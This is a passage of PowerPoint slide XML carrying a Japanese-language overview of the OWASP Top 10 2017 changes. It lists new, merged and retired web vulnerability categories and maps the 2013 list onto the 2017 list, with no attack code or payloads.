                        <a:t>を超える意見をいただき、すでにデータによる裏付けのある問題</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>機微な情報の露出と</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を除き、二つの新しい問題があります</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A8:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>安全でないデシリアライゼーション</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、この問題のある環境ではリモートからのコード実行や機微なオブジェクト操作が可能になります。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A10:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>不十分なロギングとモニタリング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、この機能の欠落は、不正な活動やセキュリティ違反の検知、インシデント対応、デジタルフォレンジックを妨げるか、あるいは大幅に遅延させる可能性があります。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>統合、引退。ただし、忘れて良いという意味ではない</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A4-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>安全でないオブジェクト直接参照</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> と </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A7-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>機能レベルアクセス制御の欠落</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>アクセス制御の不備</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>にマージされました。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>クロスサイトリクエストフォージェリ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、多くのフレームワークがこの対策を講じており</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>対策</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、アプリケーションの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>5%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>程度でのみ観察されています。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A10-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>未検証のリダクレクトとフォワード</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、アプリケーションのおよそ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>で観察されており、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>が入ったことにより、外れることになりました。</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3856983815"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6218110"/>
          <a:ext cx="6858000" cy="368544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34298">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34800">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800" b="1" baseline="0"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val="10000"/>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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクション</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A1:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクション</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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>認証の不備とセッション管理</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A2:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>認証の不備</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>クロスサイトスクリプティング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>機微な情報の露出</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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>安全でないオブジェクトへの直接参照</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="90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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>とマージ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</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A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>外部エンティティ参照 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW]</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4"/>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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不適切なセキュリティ設定</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A5:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>アクセス制御の不備</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>マージ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</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5"/>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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>機微な情報の露出</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A6:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不適切なセキュリティ設定</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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6"/>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A7</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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
